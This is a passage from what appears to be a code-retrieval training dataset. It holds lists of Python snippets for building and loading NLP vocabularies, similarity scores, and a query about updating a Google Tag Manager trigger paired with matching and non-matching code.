token = token.strip()\n itos[index] = token\n stoi[token] = index\n index += 1\n itos[index] = 'style_options'\n stoi['style_options'] = index\n itos[index+1] = 'ambience'\n stoi['ambience'] = index + 1\n return {'itos': itos, 'stoi': stoi, 'len': len(itos)}", "def _create_deleted_variation_2_dictionary_words(self):\n deleted_variation_2_dictionary_words = defaultdict(set)\n for word in self._word_2_frequency.keys():\n deleted_variations = chain(self._one_edit_deleted_variations(word), self._two_edits_deleted_variations(word))\n for deleted_variation in deleted_variations:\n deleted_variation_2_dictionary_words[deleted_variation].add(word)\n return deleted_variation_2_dictionary_words", "def load_vocab(self):\n keys = []\n values = []\n with open(self.embed_file, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n key = line.split(\" \")[0]\n value = line.split(\" \")[1:]\n keys.append(key)\n values.append(value)\n # form <dict>\n # vocab = dict(zip(keys, values))\n return keys, values", "def load(cls, w2v_vocab):\n n2v_vocab = cls()\n for key, value in w2v_vocab.__dict__.items():\n setattr(n2v_vocab, key, value)\n return n2v_vocab", "def get_encoding_dict(self) -> Dict[str, int]:\n return {k.lower():v for v,k in enumerate(self.vocabulary_list)}", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def reverse_itervalues(self):\n return self._reverse_store.itervalues()", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def InvertDict(dict_in):\n return dict(zip(dict_in.values(), dict_in.keys()))", "def create(self, vocabulary=list) -> dict:\n try:\n out = {}\n for i in range(len(vocabulary)):\n out[vocabulary[i]] = i\n return(out)\n except Exception as error:\n print(f\"Error: self.create([...]) -> {error}\")", "def build_vocab(words, vocab_size, visual_fld=None):\n utils.safe_mkdir(visual_fld)\n file = open(os.path.join(visual_fld, 'vocab.tsv'), 'w',encoding='utf8')\n\n dictionary = dict()\n count = [('UNK', -1)]\n index = 0\n count.extend(Counter(words).most_common(vocab_size - 1))\n\n for word, _ in count:\n dictionary[word] = index\n index += 1\n file.write(word + '\\n')\n\n index_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n file.close()\n return dictionary, index_dictionary", "def loadVoc(vocabFName):\n f = open(vocabFName, 'r')\n lines = f.readlines()\n f.close()\n result = dict()\n for idx, val in enumerate(lines):\n word = val.strip('\\n')\n result[word] = idx\n return result", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def text2vec(self, maxlen):\n # Vocab = {word : index}\n self.Vocab = dict()\n\n for SentenceLabel in self.Pos + self.Neg:\n vector = [0] * maxlen\n for index, word in enumerate(SentenceLabel[0]):\n if index >= maxlen:\n break\n if word not in self.Vocab.keys():\n self.Vocab[word] = len(self.Vocab)\n vector[index] = len(self.Vocab) - 1\n else:\n vector[index] = self.Vocab[word]\n SentenceLabel[0] = vector\n self.doConvert = True", "def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def read_vocabulary(vocabulary_id):\n query = (\n select([vocabulary_table])\n .where(vocabulary_table.c.id == vocabulary_id))\n res = query.execute().first()\n if res is not None:\n return dict(res)", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def create_ngram_dict(min_ngram=1, max_ngram=3, filename='./resources/vocabulary.json'):\n db_labels = get_labels_from_db()\n vocabulary = filter_ngram_labels(db_labels, min_ngram, max_ngram)\n save_dict_as_json(vocabulary, filename)\n return vocabulary", "def vocab(self):\n num_words = -1\n if not self._vocab:\n c = self._conn.cursor()\n c.execute('select feature, censored, word_id from vocab')\n\n d = {}\n for ww, cc, ii in c:\n d[ii] = ww\n d[ww] = ii\n if cc == 1:\n self._censored.add(ww)\n num_words = max(ii, num_words)\n\n logger.info(\"Loaded vocab with %i words; %i censored\" % \\\n (len(d) / 2, len(self._censored)))\n\n # Add the start symbol\n if not START_SYMBOL in d:\n d[START_SYMBOL] = num_words + 1\n d[num_words + 1] = START_SYMBOL\n\n logger.info(\"Retrieved %i words\" % num_words)\n self._vocab = d\n\n return self._vocab", "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def reverse_enum(\n enum_to_reverse: Union[\n Type[SMOOTHIE_G_CODE],\n Type[MAGDECK_G_CODE],\n Type[TEMPDECK_G_CODE],\n Type[THERMOCYCLER_G_CODE],\n Type[HEATER_SHAKER_G_CODE],\n ]\n) -> Dict:\n # I don't know what is going on with mypy, it is complaining\n # about keys not existing as an attribute. I am not calling it\n # as an attribute. I am calling it as a function.\n members = enum_to_reverse.__members__.keys()\n values = [enum_to_reverse[member] for member in members]\n return dict(zip(values, members))", "def reversed_face(self):\n return Face(self.topods_shape().Reversed())", "def to_json(self) -> str:\n vocab_dict = dict()\n # Perform sanity check to make sure that we are able to reconstruct the original vocab\n for i, tok in enumerate(self._all_tokens):\n if self._token_to_idx[tok] != i:\n warnings.warn('The vocabulary is corrupted! One possible reason is that the '\n 'tokens are changed manually without updating the '\n '_token_to_idx map. Please check your code or report an issue in '\n 'Github!')\n vocab_dict['all_tokens'] = self._all_tokens\n vocab_dict['special_token_key_value'] = self._special_token_kv\n ret = json.dumps(vocab_dict, ensure_ascii=False)\n return ret", "def reverse_items(self):\n return self._reverse_store.items()", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def get_input_vocab():\n vocab = set()\n vocab.update(list(string.ascii_letters))\n vocab.update(list(string.digits))\n vocab.update(list(string.punctuation))\n vocab.update(list(string.whitespace))\n vocab.update(['<unk>', '<pad>'])\n return dict(zip(sorted(vocab), list(range(len(vocab)))))", "def rev_dict(input_dict):\n return_dict = {}\n for i, j in input_dict.items():\n return_dict[abs(j)] = i\n return return_dict", "def convertToDict(self): \n out = dict() \n out[\"Title\"] = self.title \n editions = []\n for edition in self.editions.values(): \n editions.append(edition.convertToDict(withTitle = False))\n out[\"Editions\"] = editions\n return out", "def test_dict_ancestor_and_reversed():\n from collections import OrderedDict\n\n class Child(dict):\n def __reversed__(self):\n return reversed(range(10))\n\n seq = reversed(OrderedDict())\n return reversed(Child()), seq", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def read_dictionary():\n with open(FILE, 'r') as f:\n for vocabulary in f:\n if vocabulary[0].strip() not in dict_txt:\n dict_txt[vocabulary[0].strip()] = [vocabulary.strip()]\n else:\n dict_txt[vocabulary[0].strip()].append(vocabulary.strip())", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def invert_dictionary(dictionary):\n inverted = {}\n for key in dictionary:\n inverted[dictionary[key]] = key\n return inverted", "def from_dict(cls, dikt: dict) -> 'Vocabulary':\n return util.deserialize_model(dikt, cls)", "def deserialize(self, descriptor: Dict, data: List) -> ObjectHandle:\n return VocabularyHandle(\n values=set(data),\n name=descriptor['name'],\n namespace=descriptor['namespace'],\n label=descriptor.get('label'),\n description=descriptor.get('description')\n )", "def write_vocabulary(vocab_processor, outfile):\n vocab_size = len(vocab_processor.vocabulary_)\n with open(outfile, \"w\") as vocabfile:\n for id in range(vocab_size):\n word = vocab_processor.vocabulary_._reverse_mapping[id]\n vocabfile.write(word + \"\\n\")\n print(\"Saved vocabulary to {}\".format(outfile))", "def __repr__(self):\n l1 = \", \".join(\"{}={}\".format(x,y) for x,y in self._loading_params.items())\n l2 = \"max_vocab_size={}, min_token_freq={}, max_token_freq={}, ngrams={}\".format(\n self._max_vocab_size if hasattr(self, \"_max_vocab_size\") else None,\n self._min_token_freq if hasattr(self, \"_min_token_freq\") else 0,\n self._max_token_freq if hasattr(self, \"_max_token_freq\") else None,\n self._ngrams if hasattr(self, \"_ngrams\") else [1,1]\n )\n desc = \"Vocabulary({}, {})\".format(l1, l2)\n return desc", "def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab", "def get_vocab(which_vocab):\n path = os.path.join(mg.WORKING_PATH, 'vocab', ''.join([which_vocab, '.json'\n ]))\n if os.path.exists(path):\n with open(path, 'r') as js:\n return(json.load(js))\n else:\n return(dict())", "def to_dict(self) -> dict:\n return dict(sentences=[sentence.to_dict() for sentence in self.sentences])", "def reverse(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.Reverse(self.fst[0], result.fst)\n return result", "def make_vocab(corpus_dictionary, vocab_path):\n with open(vocab_path, 'wb') as fout:\n pickle.dump(corpus_dictionary, fout)\n print('Saved dictionary to', vocab_path)", "def load_vocab(vocab):\r\n\tvocab = [line.split()[0] for line in open(\r\n\t\t'{}{}'.format(pm.vocab_path, vocab), 'r', encoding='utf-8').read().splitlines()\r\n\t\t\t if int(line.split()[1]) >= pm.word_limit_size]\r\n\tword2idx_dic = {word: idx for idx, word in enumerate(vocab)}\r\n\tidx2word_dic = {idx: word for idx, word in enumerate(vocab)}\r\n\treturn word2idx_dic, idx2word_dic", "def reverse_indices(indices, rev_vocab):\n return ' '.join([rev_vocab[idx] for idx in indices if idx != PAD_ID])", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n tokens = reader.readlines()\n for index, token in enumerate(tokens):\n token = token.rstrip('\\n')\n vocab[token] = index\n return vocab", "def one_hot_vocab_encoding(w2vp: W2VPreprocessor \n ) -> Dict[str, np.ndarray]:\n return {\n w: i for i, w in enumerate(w2vp.vocabulary)\n }", "def copy(self):\n s = sppasVocabulary()\n for i in self.__entries:\n s.add(i)\n\n return s", "def load_vocab(vocab_file, encoding='utf8'):\n vocab = OrderedDict()\n index = 0\n with open(vocab_file, encoding=encoding) as reader:\n while True:\n token = convert_to_unicode(reader.readline())\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with tf.gfile.GFile(vocab_file, \"r\") as reader:\n while True:\n token = convert_to_unicode(reader.readline())\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab", "def load_vocab(filename):\n try:\n d = dict()\n with open(filename, encoding='utf-8') as f:\n for idx, word in enumerate(f):\n word = word.strip()\n d[word] = idx\n\n except IOError:\n raise MyIOError(filename)\n return d" ]
[ "0.77923155", "0.6690991", "0.6248791", "0.6209789", "0.6155369", "0.6095056", "0.60796165", "0.60738266", "0.606323", "0.60227686", "0.6020329", "0.5977967", "0.5962219", "0.5951278", "0.5935339", "0.591856", "0.591432", "0.5899537", "0.58708775", "0.58708775", "0.5850216", "0.5849291", "0.5848399", "0.58404076", "0.5826592", "0.58204854", "0.5785582", "0.57833856", "0.5769395", "0.57557446", "0.573616", "0.57154024", "0.5714571", "0.57054263", "0.5665455", "0.5630818", "0.560876", "0.56076604", "0.5567984", "0.55476063", "0.5537447", "0.5536431", "0.5501517", "0.5487464", "0.5485929", "0.5459498", "0.54548866", "0.54235655", "0.54126084", "0.54120004", "0.54031634", "0.5397518", "0.5395591", "0.5381651", "0.53722364", "0.53641766", "0.5362029", "0.53590846", "0.53590846", "0.53590846", "0.53493637", "0.53473496", "0.5337292", "0.53305095", "0.5313369", "0.5309733", "0.53060514", "0.52976197", "0.5295623", "0.52925366", "0.52856934", "0.52822155", "0.5266322", "0.52548784", "0.5248015", "0.5246578", "0.52464", "0.5244586", "0.5244586", "0.52435595", "0.52415204", "0.52342975", "0.5228086", "0.5226145", "0.52249813", "0.5212096", "0.5185612", "0.51718235", "0.51609355", "0.5153603", "0.5150247", "0.51495135", "0.5131622", "0.51312804", "0.5119022", "0.5103482", "0.50942427", "0.50864244", "0.5082575" ]
0.71455634
2
Update the current trigger. The GTM API does not support a partial update. Therfore, this method will send all fields expliztily set in the method arguments and those cached in the instance properties.
def update(self, refresh=False, parameter=None, **kwargs): if refresh: self.__init__(path=self._path, service=self.service) default_asset = { "maxTimerLengthSeconds": self._maxTimerLengthSeconds, "totalTimeMinMilliseconds": self._totalTimeMinMilliseconds, "uniqueTriggerId": self._uniqueTriggerId, "verticalScrollPercentageList": self._verticalScrollPercentageList, "horizontalScrollPercentageList": self._horizontalScrollPercentageList, "containerId": self._containerId, "waitForTagsTimeout": self._waitForTagsTimeout, "accountId": self._accountId, "waitForTags": self._waitForTags, "intervalSeconds": self._intervalSeconds, "eventName": self._eventName, "visibilitySelector": self._visibilitySelector, "workspaceId": self._workspaceId, "customEventFilter": self._customEventFilter, "parentFolderId": self._parentFolderId, "continuousTimeMinMilliseconds": self._continuousTimeMinMilliseconds, "selector": self._selector, "triggerId": self._triggerId, "tagManagerUrl": self._tagManagerUrl, "fingerprint": self._fingerprint, "visiblePercentageMax": self._visiblePercentageMax, "path": self._path, "name": self._name, "visiblePercentageMin": self._visiblePercentageMin, "type": self._type, "notes": self._notes, "interval": self._interval, "filter": self._filter, "autoEventFilter": self._autoEventFilter, "limit": self._limit, "checkValidation": self._checkValidation, } update_asset = {**default_asset, **kwargs} if parameter: parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)} parameter = list(parameter_dict.values()) else: parameter = self._parameter update_asset["parameter"] = [x.to_obj() for x in parameter] update_asset = {k: v for k, v in update_asset.items() if v is not None} request = self.triggers_service.update(path=self.path, body=update_asset) response = request.execute() self.__init__(trigger=response, service=self.service)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update(self, *args, **kwargs):\n # callable, but does nothing by default", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs):", "def update(self, *args, **kw):\n pass", "def update(self, *args, **kwargs):\n if args:\n self.__update(*args)\n elif kwargs:\n self.__update(**kwargs)", "def update(self, **kwargs):\n return self.parent.update_instance(self.name, kwargs)", "def update(self, *args, **kwargs):\n raise NotImplementedError", "def update(self, **params):\n self.parameters.update(params)", "def update(self, t, timestep, cache, triggered_or_finalized):\n for field in triggered_or_finalized:\n #print name, cache[name]\n if field.params.save:\n cbc_log(20, \"Saving field %s\" %field.name)\n self._action_save(field, cache[field.name], timestep, t)\n\n if timestep%self.flush_frequency == 0:\n self._flush_data()\n self._timer.completed(\"PP: flush data\")", "def update(self, *args, **kwargs) -> None:\n self.update_state(args[0])\n super().update(*args, **kwargs)", "def SendUpdatedParameters(self):\n payload = { \"Arg1\": self.href }\n return self._execute('sendUpdatedParameters', payload=payload, response_object=None)", "def update(self, params):", "def update(self):\n self._client.patch(self)", "def _update(self, count=True, forced=False):", "def update(self):\n\n pass", "def update(self,update_flags):\n pass", "def update(self) -> None:\n self._gateway.update()", "def set(self):\n if not os.path.isfile(self._trigger_file):\n with open(self._trigger_file, \"w\"):\n pass\n logger.debug(\"Set preview update trigger: %s\", self._trigger_file)", "def _update(self, data: Dict[str, Any], fields_to_modify: List[str]):\n pass", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n self.manager.update(self, **kwargs)", "def _update(self):\n pass", "def update_params(self):\n pass", "def update(self) -> None:\n ...", "def update_goal(self):\n pass", "def update(self, *args, **kwargs):\n if kwargs is not None:\n for key, value in kwargs.items():\n setattr(self, key, value)", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def send(self, trigger, **kwargs):\n temp_data = {}\n for key, value in kwargs.iteritems():\n temp_data[key] = value\n self.evt.sendMessage(trigger, data=temp_data)", "def update(self, **kwargs):\n return self._object.update(meta=kwargs)", "def update(self, **options):\n pass", "def update(self, es, **kwargs):\n pass", "def update(self)->None:\n pass", "def update(self, update_fields=None):\n instance = self.get_object() \n if not update_fields: \n update_fields=self.request.PUT.keys()\n try: \n for field in update_fields:\n update_value = self.request.PUT.get(field) # get value from PUT\n setattr(instance, field, update_value) # renew fields\n instance.save() # save updates\n except IntegrityError: # catch error\n return self.response(status='Failed to Update.') \n return self.response(\n status='Successfully Update')", "def post_update(self):\n\t\tlogging.info(\"Beginning\")\n\t\toptions=dict(\n\t\t\tapi_key = self.apiKey\n\t\t)\n\t\tcounter = 0\n\t\tfor key, value in self.field.items():\n\t\t\tif value != None:\n\t\t\t\tcounter += 1\n\t\t\t\toptions[key] = value\n\t\tif counter == 0:\n\t\t\tlogging.error(\"There was nothing to update. Check the field values\")\n\t\t\treturn\n\t\turl = '{ts}update'.format(\n\t\t\tts=self.tsRUL,\n\t\t)\n\t\tlogging.debug(\"Options = \" + str(options))\n\t\ttry:\n\t\t\tresults = requests.post(url, params=options)\n\t\t\tif results.ok != True:\n\t\t\t\tlogging.error(\"The update failed\")\n\t\t\t\treturn False\n\t\texcept:\n\t\t\tlogging.error(\"There was an error trying to update the values\")\n\t\t\treturn False\n\t\tself.clear_field_values()\n\t\treturn True", "def on_update(self, **kwargs):\n self.get_client()\n self.update(self, kwargs['sender'], kwargs['instance'])", "def update_fields(self, request):\n message = request.message\n objects = message.model.objects\n if message.filter is not None and len(message.filter) > 0:\n objects.filter(**message.filter).update(**message.kwargs)\n\n else:\n objects.all().update(**message.kwargs)\n\n return SuccessReply()", "def update(self, **kwargs):\n print(\"Updating model\")\n print(kwargs)\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def _update(self, force=False):\n if self.autoupdate:\n self.update(force)", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self, **kwargs):\n return self._update_data(self.put(None, data=kwargs))", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, **kwargs):\n return self.manager.update(self, **kwargs)", "def update(self, args):\n pass", "def _update_params(self):\n pass", "def update(self, *args, **kwargs):\n self.logger.update(*args, **kwargs)", "def Trigger(self):\n\t\tpayload = { \"Arg1\": self.href }\n\t\treturn self._execute('trigger', payload=payload, response_object=None)", "def update(self) -> None:\n pass", "def update(self, *args: Any, **kwargs: Any) -> None:\n self._check_for_increment(\"update\")\n self[-1].update(*args, **kwargs)", "def _update(self):\n self.all_params = {}\n self._update_experiment_params()\n self._update_preprocessing_params()\n self._update_model_params()", "def update(self):\r\n pass", "def fire_trigger(self, trigger):\n if not self.exists():\n return\n if trigger in self.events:\n for action in self.events[trigger]:\n action(requestor=self)", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-featured', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def update(self):\n return self._process('update')", "def update(self, *args):\n qry = UpdateEntityQuery(self)\n self.context.add_query(qry)\n return self", "def trigger_build(self, postdata):\n pass", "def partial_update(self, request, guild_id, *args, **kwargs):\r\n data = request.data\r\n try:\r\n # Find the existing guild entry\r\n guild = Guild.objects.get(guild_id=guild_id)\r\n except ObjectDoesNotExist:\r\n # Entry not found - create one!\r\n guild = Guild(guild_id=guild_id)\r\n # Update kwargs\r\n for key, value in data.items():\r\n print(key, value)\r\n if value == \"reset\": value = None\r\n setattr(guild, key, value)\r\n # Submit changes\r\n guild.save()\r\n serializer = self.get_serializer(guild)\r\n return Response(serializer.data)", "def create_update_trigger(self):\n self.execute(self.commands.update_function(\n self.name,\n self._equals(\n self.intersection.dest_columns,\n 'NEW',\n self.intersection.origin_columns\n ),\n self.primary_key_column\n ))\n\n self.execute(self.commands.update_trigger(\n self.triggers['UPDATE'],\n self.source.name,\n self.name\n ))", "def salesforce_update(self, obj_name, obj_id, **kwargs):\n self.builtin.log(\n \"Updating {} {} with values {}\".format(obj_name, obj_id, kwargs)\n )\n obj_class = getattr(self.cumulusci.sf, obj_name)\n return obj_class.update(obj_id, kwargs)", "def update(self):\n pass", "def update( ):\r\n pass", "def update(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)", "def update(self, refresh=False, parameter=None, **kwargs):\n if parameter and not isinstance(parameter, list):\n raise ValueError(\n \"'parameter' has to be a list of :class:`GTMParameters` or 'None'.\"\n )\n\n if refresh:\n self.__init__(path=self._path, service=self.service)\n\n default_asset = {\n \"paused\": self._paused,\n \"setupTag\": self._setupTag,\n \"firingRuleId\": self._firingRuleId,\n \"teardownTag\": self._teardownTag,\n \"priority\": self._priority,\n \"parentFolderId\": self._parentFolderId,\n \"scheduleStartMs\": self._scheduleStartMs,\n \"scheduleEndMs\": self._scheduleEndMs,\n \"tagFiringOption\": self._tagFiringOption,\n \"blockingRuleId\": self._blockingRuleId,\n \"firingTriggerId\": self._firingTriggerId,\n \"name\": self._name,\n \"type\": self._type,\n \"notes\": self._notes,\n \"liveOnly\": self._liveOnly,\n \"blockingTriggerId\": self._blockingTriggerId,\n }\n update_asset = {**default_asset, **kwargs}\n\n if parameter:\n parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)}\n parameter = list(parameter_dict.values())\n else:\n parameter = self._parameter\n\n update_asset[\"parameter\"] = [x.to_obj() for x in parameter]\n\n update_asset = {k: v for k, v in update_asset.items() if v is not None}\n\n request = self.tags_service.update(path=self.path, body=update_asset)\n response = request.execute()\n self.__init__(tag=response, service=self.service)", "def update_goal_info(self):\n self._goal_info_cache = self._get_goal_info()", "def _build_update_params(self, params):", "def update_values(self, to_update):\n for key, value in kwargs.iteritems():\n self.params[key] = value\n # update the possibly dependent parameters\n self.set_filenames()", "def Update(self):\r\n\r\n # does nothing\r\n pass", "def update(cls) -> None:\n raise NotImplementedError", "def gen_update(self, TL):\r\n pass", "def beam_update(self, beams, extra):\n return extra", "def __update_params(self,**kwargs):\n updatedArgSet = set(self._updateParamsArgs) & kwargs.viewkeys()\n if len(updatedArgSet) > 0:\n args = self._subDictionary(self._updateParamsArgs)\n newArgs = self._onParamsUpdate(**args)\n updatedArgs =dict()\n for k in updatedArgSet:\n try:\n updatedArgs[k] = newArgs[k]\n except:\n pass\n\n self.__dictionary.update(newArgs)\n else:\n pass", "def updateParameters(self):\n\n return", "def update(self, update, **kwargs):\n try:\n self.saved = False\n function_to_call = self.update_dic[update]\n function_to_call(**kwargs)\n except KeyError as e:\n pass", "def update(self, **kwargs):\n self.pending_update = True\n self.update_data(**kwargs)\n self.update_selection()\n if self.context is not None and self.context.doc is not None:\n self.context.doc.add_next_tick_callback(self.update_source)", "def update(self, data):\n pass", "def update(self, data):\n pass" ]
[ "0.5962123", "0.5947622", "0.5947622", "0.5947622", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.59135634", "0.5901567", "0.5882499", "0.5750089", "0.56001323", "0.55886126", "0.5582611", "0.5573218", "0.5543781", "0.5498977", "0.54955", "0.54674727", "0.5463991", "0.54621005", "0.5460992", "0.54535913", "0.5450029", "0.5422599", "0.5419838", "0.5419838", "0.54126394", "0.5406283", "0.54036415", "0.53973114", "0.53803176", "0.5374489", "0.537222", "0.537222", "0.5365947", "0.53652555", "0.5358669", "0.53584826", "0.5354586", "0.53543305", "0.534246", "0.5336804", "0.5327476", "0.5324454", "0.5313821", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.5308361", "0.53043085", "0.52973455", "0.52973455", "0.52973455", "0.5254326", "0.52519715", "0.5236873", "0.5231428", "0.5225212", "0.5219121", "0.5218469", "0.52175814", "0.5188678", "0.51811504", "0.5172458", "0.51674587", "0.5159252", "0.5156413", "0.5146719", "0.51419723", "0.51411456", "0.5116667", "0.5109338", "0.5101641", "0.51013285", "0.51007056", "0.5095034", "0.50850695", "0.50815475", "0.5076299", "0.5073628", "0.50720465", "0.5068525", "0.50659895", "0.5056036", "0.504933", "0.504933" ]
0.56299794
13
Delete the current trigger.
def delete(self): request = self.triggers_service.delete(path=self._path) request.execute()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _delTrigger(self, message: IRCMessage) -> IRCResponse:\n triggerName = message.parameterList[1]\n if triggerName in self.storage:\n del self.storage[triggerName]\n return IRCResponse(f\"Trigger {triggerName} deleted!\", message.replyTo)\n else:\n return IRCResponse(f\"No trigger named {triggerName} exists.\", message.replyTo)", "def delete_trigger(self, trigger_id):\n self._delete(path=\"triggers/{}\".format(trigger_id))", "def create_delete_trigger(self):\n self.execute(self.commands.delete_function(\n dest_table=self.name,\n pk_col=self.primary_key_column\n ))\n\n self.execute(self.commands.delete_trigger(\n self.triggers['DELETE'],\n self.source.name,\n self.name\n ))", "def clear(self):\n if os.path.isfile(self._trigger_file):\n os.remove(self._trigger_file)\n logger.debug(\"Removed preview update trigger: %s\", self._trigger_file)", "def delete(self):\n\t\tdel self.scheduler.find(self)\n\t\tdel self", "def delete(self, trigger_id):\n try:\n self._client.delete(self._full_path(trigger_id))\n return False\n except InvalidJSONError:\n return True", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n pass", "def delete(self):\n self.current_revision.delete()", "def deleteOrDelay(self):\n self.delete()", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def __macroDelete(self):\n self.activeWindow().macroDelete()", "def test_remove_trigger(self) -> None:\n trigger = auraxium.Trigger(auraxium.event.Death, name='on_death')\n self.client.add_trigger(trigger)\n self.assertEqual(len(self.client.triggers), 1)\n self.client.remove_trigger('on_death')\n self.assertEqual(len(self.client.triggers), 0)\n with self.assertRaises(KeyError):\n self.client.remove_trigger('does_not_exist')", "def delete(self):\n 